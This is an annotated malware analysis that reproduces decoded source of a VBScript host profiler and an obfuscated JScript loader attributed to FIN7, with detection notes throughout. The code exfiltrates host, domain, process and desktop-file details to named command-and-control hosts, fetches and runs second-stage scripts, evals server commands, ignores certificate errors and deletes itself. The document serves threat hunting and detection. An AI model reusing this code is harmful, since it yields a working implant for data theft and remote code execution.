////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///// POSSIBLE FIN7 VBS PART (DECODED): HOST PROFILER / ACTIVE DIRECTORY SEARCHER
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
' ---------------------------------------------------------------------------
' Analyst annotation (reviewer): captured first-stage VBScript host profiler.
' In the wild this is a single colon-separated line; it is broken onto one
' statement per line here for readability only - no token has been changed
' (the original typos get_grivers / drivers are kept). Do NOT execute this:
' it posts host details to a live-looking C2 and runs whatever comes back.
' ---------------------------------------------------------------------------
' Errors are swallowed globally, so a failed WMI/HTTP call yields empty
' beacon fields instead of a crash - expect partial beacons in telemetry.
on error resume next
' Single C2 endpoint; every request in this script goes to this URL.
panel_url = "https://domenuscdm.com/info"
set objwmiservice = getobject("winmgmts:" & "{impersonationlevel=impersonate}!\\" & "." & "\root\cimv2")
set wshshell = createobject("wscript.shell")
set fs = createobject("scripting.filesystemobject")
appdata_folder = wshshell.expandenvironmentstrings("%appdata%")
username = wshshell.expandenvironmentstrings("%username%")

' send(url, data): synchronous HTTP POST to the panel, returns the response
' body. An empty data argument is turned into the task-fetch request
' ("id=<host id>&type=get"). MSXML2.ServerXMLHTTP is used, so the traffic
' rides WinHTTP rather than the browser/WinINet stack. The user agent is
' hard-coded, and "rv:6.0" paired with "Firefox/67.0" is an internally
' inconsistent string - a cheap proxy-log signature.
function send(url, data)
    if data = "" then
        data = "id=" & get_id() & "&type=get"
    end if
    set xmlhttp = createobject("msxml2.serverxmlhttp")
    xmlhttp.open "post", url, false
    xmlhttp.setrequestheader "user-agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:6.0) Gecko/20100101 Firefox/67.0"
    xmlhttp.setrequestheader "content-type", "application/x-www-form-urlencoded"
    xmlhttp.send data
    send = xmlhttp.responsetext
end function

' run_js(js): writes the server-supplied second stage to %APPDATA%\some.js
' and launches it with wscript.exe through Win32_Process.Create (WMI).
' Hunting pivot: a wscript.exe whose command line is "wscript.exe
' <profile>\AppData\Roaming\some.js", typically parented by the WMI
' provider host rather than by this script (Win32_Process.Create behaviour;
' confirm against your own EDR's parent-process attribution).
' The return value of Create (errreturn) is never checked.
function run_js(js)
    set tf = fs.createtextfile(appdata_folder & "\some.js", true)
    tf.write(js)
    tf.close
    strcommand = "wscript.exe " & appdata_folder & "\some.js"
    set objwmiservice = getobject("winmgmts:" & "{impersonationlevel=impersonate}!\\" & "." & "\root\cimv2")
    set objprocess = objwmiservice.get("win32_process")
    errreturn = objprocess.create(strcommand, null, null, intprocessid)
end function

' get_id(): host identifier = MAC address of the first IP-enabled adapter
' with the colons stripped. Only the first qualifying adapter is used
' (exit for); if none qualifies, id stays empty and the beacon carries "id=".
function get_id()
    for each objitem in objwmiservice.execquery("select * from win32_networkadapterconfiguration where ipenabled = true")
        macaddress = objitem.macaddress
        if typename(macaddress) = "String" and len(macaddress) > 1 then
            id = replace(macaddress, ":", "")
            exit for
        end if
    next
    get_id = id
end function

' get_computer_info(mem): Win32_ComputerSystem lookup.
'   mem = ""        -> returns the "&Hostname=..&DomainMember=..&DomainName=.."
'                      fragment that is appended to the beacon.
'   mem = anything  -> returns only "yes"/"no" for domain membership
'                      (count_domain_hosts calls it with "mem").
function get_computer_info(mem)
    set colsettings = objwmiservice.execquery("select * from win32_computersystem")
    for each objcomputer in colsettings
        hostname = objcomputer.name
        domainname = objcomputer.domain
        if objcomputer.partofdomain then
            domainmember = "yes"
        else
            domainmember = "no"
        end if
    next
    if mem = "" then
        get_computer_info = "&Hostname=" & hostname & "&DomainMember=" & domainmember & "&DomainName=" & domainname
    else
        get_computer_info = domainmember
    end if
end function

' get_grivers() [sic]: semicolon-separated list of logical drives.
function get_grivers()
    set dc = fs.drives
    for each drive in dc
        drivers = drivers & drive & ";"
    next
    get_grivers = drivers
end function

' get_processlist(): "%%%"-separated names of all running processes
' (Win32_Process). Presumably consumed server-side to screen for analysis
' or security tooling before a second stage is served - the panel's
' "ok"/not-"ok" decision below is the only gate visible from this side.
function get_processlist()
    for each process in getobject("winmgmts:{impersonationlevel=impersonate}").instancesof("win32_process")
        processlist = processlist & process.name & "%%%"
    next
    get_processlist = processlist
end function

' get_desktopfiles(): "%%%"-separated full paths of the files on the
' user's Desktop (c is a File object; its default property, Path, is what
' the concatenation picks up). count_d is assigned but never used.
' Note: nothing here is URL-encoded, so a file name containing "&" or "="
' would corrupt the form body the panel parses.
function get_desktopfiles()
    desktop = wshshell.specialfolders("desktop")
    set col = fs.getfolder(desktop).files
    count_d = 0
    for each c in col
        desktopfilelist = desktopfilelist & c & "%%%"
    next
    get_desktopfiles = desktopfilelist
end function

' count_domain_hosts(): on domain-joined hosts, spawns a hidden
' (window style 0) powershell.exe that builds the LDAP DN from the host's
' own domain name and counts objectCategory=computer with a
' DirectorySearcher - i.e. sizes the domain for the operator. The count is
' handed back through %APPDATA%\results.txt (ac = Add-Content), which is
' polled up to 6 times at 20 s intervals (about 2 minutes) and deleted
' once read. Result encoding:
'   -1 = not domain-joined (decided either here or inside PowerShell)
'   -2 = the LDAP query threw
'   -3 = results.txt never appeared (PowerShell blocked, slow, or failed)
' Detection: wscript.exe spawning powershell.exe with "DirectorySearcher"
' and "objectCategory=computer" on the command line, plus a short-lived
' %APPDATA%\results.txt. The inner single-line If ... Then ... end if is
' reproduced exactly as captured.
function count_domain_hosts()
    if get_computer_info("mem") = "yes" then
        wshshell.run "powershell.exe $s=gwmi Win32_ComputerSystem; if (-not $s.PartOfDomain) { $n=-1 } else { $dr='LDAP://'; $s.Domain.Split('.') | % { $dr+='DC='+$_+',' }; $dr=$dr.TrimEnd(','); try { $ad=New-Object DirectoryServices.DirectorySearcher (([adsi]$dr),'(objectCategory=computer)',('name')); $n=($ad.FindAll()).Count } catch { $n=-2 } }; $path = $env:appdata + '\results.txt';ac $path $n", 0
        appdata_file = appdata_folder & "\results.txt"
        domainhosts = -3
        for i = 1 to 6
            if fs.fileexists(appdata_file) then
                set file = fs.opentextfile(appdata_file, 1)
                If Not file.atendofstream Then domainhosts = file.readall end if
                file.close
                fs.deletefile appdata_file
                exit for
            end if
            wscript.sleep(20000)
        next
        count_domain_hosts = domainhosts
    else
        count_domain_hosts = -1
    end if
end function

' Entry: build the profiling beacon (type=put) and post it. Only if the
' panel answers exactly "ok" is the second stage fetched (type=get) and
' executed via run_js. Several fields are hard-coded to "nothing"
' (SystemInfo, SoftwareInfo, NetworkInfo, DesktopScreenshot, WebHistory),
' so the panel presumably shares its schema with richer clients;
' "stype=vbs" tells it which client type is calling. The beacon body is
' sent in clear (HTTPS only, no additional encoding).
data = "id=" & get_id() & "&type=put" & get_computer_info("") & "&DomainHosts=" & count_domain_hosts() & "&UserName=" & username & "&LogicalDrives=" & get_grivers() & "&SystemInfo=nothing&SoftwareInfo=nothing&NetworkInfo=nothing&ProcessList=" & get_processlist() & "&DesktopFileList=" & get_desktopfiles() & "&DesktopScreenshot=nothing&WebHistory=nothing&stype=vbs"
response = send(panel_url, data)
if response = "ok" then
    js = send(panel_url, "")
    run_js(js)
end
' NOTE(review): the published listing stops at "end" - the closing "if" of
' this block is missing from the sample as captured.
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///// POSSIBLE FIN7 JS LOADER: NEW main() & start_delay() FUNCTIONS ////////////
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
function anonymous() {
/// Decoded loader body follows. The "anonymous" wrapper name above is what
/// Function.prototype.toString() reports for a new Function() object, so this
/// text was presumably recovered that way from the packed sample (TODO confirm).
// Obfuscator string table. Every literal the loader needs is bound to a
// random-looking identifier; several values appear more than once (the
// obfuscator apparently emits one variable per literal occurrence) and a
// number of them are never referenced below. Annotated from the uses in
// the functions that follow.
var nipgigjehdaf = 'string'; // unused duplicate of jlojpefetpu
var qhuxyzewpu = '&'; // separator between the fixed beacon prefix and data (send_data)
var qqimgiwpife = 'Scripting.FileSystemObject';
var kevfezajpi = 'WScript.Shell';
var jiskypfokry = 'winmgmts:root/CIMV2';
var ocbuxhygfezir = '&_&'; // unused duplicate of ixopyzlyk
var abxejroqowo = 'request'; // unused duplicate of ujumajovamw
var dajoxijify = 'POST'; // unused duplicate of qlakubuqica
var onambevxiva = ''; // unused
var adymajaxbe = ''; // unused
var pmidkopihyno = '?type=name'; // query string of the task-poll request
var hfafsucohdiz = 'encrypt'; // unused duplicate of efekufuqa
var thojkequho = 'Microsoft'; // first half of the "Microsoft\Windows" self-delete guard
var ujxuxbogrotelq = 'hide'; // get_path file-name word
var lwafvehigvisv = 'decrypt'; // unused duplicate of aroligqanzi
// Fixed beacon prefix. "secret=hf63FGEjrg28f2" is a hard-coded panel token
// (group=vbs suggests a per-campaign client group; time=120000 matches the
// 2-minute beacon interval). Good network-content signature after decoding.
var eliqabweql = 'group=vbs&rt=0&secret=hf63FGEjrg28f2&time=120000&uid=';
var habhekxyspudxo = 'delete'; // get_path file-name word
var aroligqanzi = 'decrypt'; // crypt_controller mode selector
var ofidibahte = 'new'; // unused duplicate of duwmulydi
var ixopyzlyk = '&_&'; // delimiter between XOR'd body and its key (crypt_controller)
var yqiqazjecy = 'show'; // get_path file-name word
var ujumajovamw = 'request'; // send_data type for the task poll
var ymwaqdiqzeqtigv = '_'; // separator / replacement char in id()
var hyqxukkemlanfo = 'no'; // send_data failure sentinel
var duwmulydi = 'new'; // used in both get_path word lists
var uzdibikhovfyxf = 'Windows'; // second half of the "Microsoft\Windows" self-delete guard
var tkymjekarlujf = 'https://environmentales.com/'; // C2 base URL (do not resolve/contact)
var yqbyjrepwyj = 'pictures'; // get_path directory word
var qlettugibomc = ''; // unused
var yfsacuwfymijc = ''; // empty string, used as split/join separator
var sircesadvelny = '&id=';
var xvelmonovpumk = 'renew'; // get_path file-name word
var efekufuqa = 'encrypt'; // crypt_controller mode selector
var emgulmommovab = 'page_id=new'; // payload of every task poll (main)
var adsefegezycz = 'img'; // get_path directory word
var noczojceqki = 'Unknown'; // hostname placeholder in id()
var gurzukqyzxigru = ''; // unused
var jlojpefetpu = 'string'; // typeof comparison in id()
var astovqicygy = 'Content-Type';
var nokikoxuzd = 'application/x-www-form-urlencoded';
var owikvijah = 'User-Agent';
var osycfybvic = 'add'; // get_path file-name word
var kimxogbabfavfu = 'esmykjykago='; // form field name that carries the XOR'd beacon
var ozhujyhjuta = 'sync'; // get_path file-name word
var ufyqoqdetab = ''; // unused
var ftixxafijtivy = 'info'; // get_path directory word
var zugykxegotdu = 'no'; // unused duplicate of hyqxukkemlanfo
var ktynfahexxylw = '?type=content&id='; // query string of the result-upload request
var orcyzuluh = 'MSXML2.ServerXMLHTTP'; // WinHTTP-backed client (see setOption in send_data)
var epjivehug = 'encrypt'; // unused duplicate of efekufuqa
var qomilure = 'AppData'; // environment sanity check at the bottom of the script
var duhjikgydivr = '/';
var ewohkagunecr = 'z'; // upper bound for "acceptable" hostname characters in id()
var iwvihfysih = '_'; // unused duplicate of ymwaqdiqzeqtigv
var qlakubuqica = 'POST';
var ekvekxytugtath = 'images'; // get_path directory word
var qoropywlykli = '%APPDATA%';
// id(): builds the per-host identifier "<MAC>_<DNSHostName>" from the first
// IP-enabled adapter returned by Win32_NetworkAdapterConfiguration.
// - The `x.typeof ? x.typeof : typeof x` IIFEs are an obfuscator wrapper
//   around plain `typeof x`; jlojpefetpu is the literal 'string'.
// - Any hostname character that sorts above 'z' (ewohkagunecr) - e.g.
//   '{', '|', '~' or non-ASCII - is replaced by '_' (ymwaqdiqzeqtigv).
//   The 'Unknown' branch is only reachable for a non-string value whose
//   .length is < 1, so a string hostname is never replaced by 'Unknown';
//   an empty string hostname yields "<MAC>_".
// - If no adapter has a usable MAC the function falls off the end and
//   returns undefined, which send_data concatenates into the beacon as the
//   text "undefined".
// - NOTE(review): if DNSHostName comes back null, `dns_hostname.length`
//   throws (typeof null is 'object', so the && does not short-circuit);
//   the TypeError propagates to send_data's catch and the poll degrades
//   to the 'no' sentinel.
function id() {
var lrequest = wmi.ExecQuery('select * from Win32_NetworkAdapterConfiguration where ipenabled = true');
var lItems = new Enumerator(lrequest);
for (; !lItems.atEnd(); lItems.moveNext()) {
var mac = lItems.item().macaddress;
var dns_hostname = lItems.item().DNSHostName;
if (function () {
try {
return mac.typeof ? mac.typeof : typeof mac;
} catch (e) {
return typeof mac;
}
}() === jlojpefetpu && mac.length > 1) {
if (function () {
try {
return dns_hostname.typeof ? dns_hostname.typeof : typeof dns_hostname;
} catch (e) {
return typeof dns_hostname;
}
}() !== jlojpefetpu && dns_hostname.length < 1) {
dns_hostname = noczojceqki;
} else {
// Sanitise: every char code above 'z' becomes '_' (length is preserved).
for (var i = 0; i < dns_hostname.length; i++) {
if (dns_hostname.charAt(i) > ewohkagunecr) {
dns_hostname = dns_hostname.substr(0, i) + ymwaqdiqzeqtigv + dns_hostname.substr(i + 1);
}
}
}
// First qualifying adapter wins; remaining adapters are never examined.
return mac + ymwaqdiqzeqtigv + dns_hostname;
}
}
}
// crypt_controller(type, request): the loader's "encryption" - a repeating
// XOR against the ASCII digits of a 4-digit decimal key.
//   encrypt (type === efekufuqa): key = random integer 1000..9999 rendered
//     as a string and split into its digit characters; the request is first
//     converted to a UTF-8 byte string (unescape(encodeURIComponent(..)));
//     each byte is XORed with '0'..'9' (0x30..0x39) cycling every 4 chars;
//     the KEY IS APPENDED IN CLEAR after '&_&' and the whole thing is
//     escape()d. Net effect: beacon bodies are trivially decodable and end
//     in "%26_%26NNNN" (escape() encodes '&' as %26, leaves '_' and digits
//     alone) - a stable network signature for the esmykjykago= field.
//   decrypt (type === aroligqanzi): unescape, split on '&_&', XOR the first
//     part with the digit characters of the second part.
// Only 9000 possible keys, no integrity check, no secret - this provides
// obfuscation, not confidentiality.
// NOTE(review): in decrypt mode a response without '&_&' makes
// request_split[1] undefined and `.split` throws; main()'s catch swallows it.
function crypt_controller(type, request) {
var encryption_key = yfsacuwfymijc;
if (type === aroligqanzi) {
request = unescape(request);
var request_split = request.split(ixopyzlyk);
request = request_split[0];
encryption_key = request_split[1].split(yfsacuwfymijc);
} else {
// Math.random() key, 4 decimal digits, stored as an array of characters.
encryption_key = (Math.floor(Math.random() * 9000) + 1000).toString().split(yfsacuwfymijc);
request = unescape(encodeURIComponent(request));
}
var output = new Array(request.length);
for (var i = 0; i < request.length; i++) {
// Key byte is the ASCII code of the digit character, not its numeric value.
var charCode = request.charCodeAt(i) ^ encryption_key[i % encryption_key.length].charCodeAt(0);
output[i] = String.fromCharCode(charCode);
}
var result_string = output.join(yfsacuwfymijc);
if (type === efekufuqa) {
// Key travels with the ciphertext: "<xor body>&_&<4 digits>", then escape()d.
result_string = result_string + ixopyzlyk + encryption_key.join(yfsacuwfymijc);
result_string = escape(result_string);
}
return result_string;
}
// get_path(): picks a random C2 URL of the form
//   https://environmentales.com/<dir>/<file>
// with dir in {images, pictures, img, info, new} and file in
// {sync, show, hide, add, new, renew, delete} - 35 combinations, chosen
// fresh for every request, so URL-based blocking needs the host, not the
// path. The query string is appended by send_data.
function get_path() {
var pathes = [
ekvekxytugtath,
yqbyjrepwyj,
adsefegezycz,
ftixxafijtivy,
duwmulydi
];
var files = [
ozhujyhjuta,
yqiqazjecy,
ujxuxbogrotelq,
osycfybvic,
duwmulydi,
xvelmonovpumk,
habhekxyspudxo
];
var path = pathes[Math.floor(Math.random() * pathes.length)] + duhjikgydivr + files[Math.floor(Math.random() * files.length)];
return tkymjekarlujf + path;
}
// send_data(type, data, crypt): single synchronous POST to the C2.
//   type === 'request' (ujumajovamw): task poll.
//     POST <random path>?type=name
//     body: esmykjykago=<xor( "group=vbs&rt=0&secret=...&time=120000&uid="
//           + uniq_id + "&id=" + id() + "&" + data )>
//     (always XOR-encoded; the crypt flag is ignored on this branch)
//   any other type: result/content upload.
//     POST <random path>?type=content&id=<uniq_id>
//     body: data, XOR-encoded only if crypt is truthy.
// Returns the response body, or the sentinel 'no' (hyqxukkemlanfo) on ANY
// exception (ActiveX creation failure, network error, id() throwing...).
// Hard-coded User-Agent: "rv:69.0" with "Firefox/50.0" is self-contradictory
// and differs from the VBS stage's UA - both are cheap proxy signatures.
// setOption(2, 13056): option 2 on ServerXMLHTTP is the ignore-server-
// certificate-errors option (per the MSXML docs); 13056 = 0x3300 = unknown
// CA | wrong usage | CN mismatch | expired. The loader therefore talks to
// any TLS endpoint, self-signed or intercepted - it is not affected by
// inspecting proxies, and domain fronting/sinkholing with a mismatched
// certificate still works against it.
// `e` is assigned in the catch but never used.
function send_data(type, data, crypt) {
{
var e;
try {
var http_object = new ActiveXObject(orcyzuluh);
if (type === ujumajovamw) {
http_object.open(qlakubuqica, get_path() + pmidkopihyno, false);
data = kimxogbabfavfu + crypt_controller(efekufuqa, eliqabweql + uniq_id + sircesadvelny + id() + qhuxyzewpu + data);
} else {
http_object.open(qlakubuqica, get_path() + ktynfahexxylw + uniq_id, false);
if (crypt) {
data = crypt_controller(efekufuqa, data);
}
}
http_object.setRequestHeader(owikvijah, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0');
http_object.setRequestHeader(astovqicygy, nokikoxuzd);
// Ignore all server certificate errors (see header comment).
http_object.setOption(2, 13056);
http_object.send(data);
return http_object.responseText;
} catch (_e) {
e = _e;
{
return hyqxukkemlanfo;
}
}
}
}
// main(): the beacon loop.
//   1. Poll the panel with "page_id=new" (type 'request', always encoded).
//   2. Anything other than the 'no' failure sentinel is treated as a task:
//      XOR-decoded, passed through rewrite(), and eval()'d. rewrite is not
//      defined anywhere in this listing - presumably a helper from the rest
//      of the sample (or stripped); TODO confirm against the full file.
//      Exceptions from decoding/eval are swallowed silently.
//   3. Sleep 120000 + (floor(random * 16001) - 5000) ms, i.e. a uniformly
//      jittered 115 s .. 131 s (asymmetric around the 2-minute base), then
//      recurse.
// The tail call is a genuine recursive call, not a loop, so each beacon
// adds a frame; presumably the operator relies on a served task ending the
// script before that matters (not verifiable here).
// Detection: a wscript.exe process making a POST to the C2 host roughly
// every 2 minutes with a different /<dir>/<file> path each time and an
// "esmykjykago=" form body.
function main() {
var ncommand = yfsacuwfymijc;
ncommand = send_data(ujumajovamw, emgulmommovab, true);
if (ncommand !== hyqxukkemlanfo) {
{
var e;
try {
// Remote code execution by design: server response -> decode -> eval.
eval(rewrite(crypt_controller(aroligqanzi, ncommand), true));
} catch (_e) {
e = _e;
{
}
}
}
}
var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000);
WScript.Sleep(random_knock);
main();
}
// start_delay(): fixed 120 s sleep before the first beacon. Likely intended
// to outlast short automated-sandbox runs; a sandbox that does not
// accelerate WScript.Sleep will see no network activity for the first two
// minutes.
function start_delay() {
var s = WScript;
s.Sleep(120000);
}
// Script entry (runs inside the `function anonymous() {` wrapper above).
// `first` is declared but never used.
var first = false;
var shell = new ActiveXObject(kevfezajpi); //WScript.Shell
var fso = new ActiveXObject(qqimgiwpife); //Scripting.FileSystemObject
var wmi = GetObject(jiskypfokry); // winmgmts:root/CIMV2
// "uid" sent with every beacon: the UTC millisecond of start-up, i.e. an
// integer 0..999. Not unique across hosts or even across restarts; it
// only distinguishes runs on the panel side.
var uniq_id = new Date().getUTCMilliseconds();
var app_path = shell.expandEnvironmentStrings(qoropywlykli); //%APPDATA%

// Environment sanity / anti-analysis check: only run when the parent of
// %APPDATA% (normally <profile>\AppData) has "AppData" beyond position 5
// of its absolute path - i.e. a conventional user profile. Unusual or
// relocated profiles skip execution entirely.
if (fso.GetAbsolutePathName(fso.GetParentFolderName(app_path)).indexOf(qomilure) > 5) { // AppData
// Self-delete unless the script lives under a path containing
// "Microsoft\Windows" (thojkequho + "\" + uzdibikhovfyxf; fromCharCode(92)
// is the backslash). Presumably the persisted copy sits under such a path
// (e.g. a Start Menu / Startup location) and the initial drop elsewhere is
// removed from disk while WSH keeps running it from memory - TODO confirm
// the persistence location against the full sample.
if (WScript.ScriptFullName.indexOf(thojkequho + String.fromCharCode(92) + uzdibikhovfyxf) < 0) {
// thojkequho = "Microsoft", uzdibikhovfyxf = "Windows" (the original
// inline comment mislabelled thojkequho).
fso.deleteFile(WScript.ScriptFullName);
}
{
var e;
try {
// 2-minute start delay, then the beacon loop. If anything in that path
// throws, the loop is simply started again without the delay.
start_delay();
main();
} catch (_e) {
e = _e;
{
main();
}
}
}
}
// NOTE(review): the enclosing `function anonymous() {` is never closed in
// this listing (the page ends here); the sample as published is truncated.